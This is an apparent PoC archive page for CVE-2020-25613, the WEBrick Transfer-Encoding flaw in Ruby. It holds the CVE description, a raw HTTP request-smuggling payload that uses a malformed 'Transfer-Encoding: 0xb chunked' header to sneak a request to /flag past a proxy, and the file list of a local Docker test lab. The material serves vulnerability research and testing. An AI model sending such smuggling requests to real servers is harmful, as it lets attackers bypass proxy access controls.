Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-25613 PoC — Ruby 环境问题漏洞

Source
https://github.com/metapox/CVE-2020-25613
Associated Vulnerability
Title:Ruby 环境问题漏洞 (CVE-2020-25613)
Description:An issue was discovered in Ruby through 2.5.8, 2.6.x through 2.6.6, and 2.7.x through 2.7.1. WEBrick, a simple HTTP server bundled with Ruby, had not checked the transfer-encoding header value rigorously. An attacker may potentially exploit this issue to bypass a reverse proxy (which also has a poor header check), which may lead to an HTTP Request Smuggling attack.
Readme
# POC
```
POST / HTTP/1.1
Host: 127.0.0.1:1080
Content-Type: text/html
Content-Length: 129
Connection: keep-alive
Transfer-Encoding: 0xb chunked

1
A
0

POST /flag HTTP/1.1
Host: 127.0.0.1:1080
Content-Length: 180
Connection: keep-alive
Content-Type: text/html
URI:
```
File Snapshot

 [4.0K]  /data/pocs/b88ef8b15994affcbeef141b65fa6a2b7cd2546c
├── [ 592]  docker-compose.yml
├── [4.0K]  haproxy
│   └── [ 320]  haproxy.cfg
├── [4.0K]  nginx
│   └── [ 542]  nginx.conf
├── [ 270]  README.md
└── [4.0K]  ruby-app
    └── [ 547]  server.rb

3 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →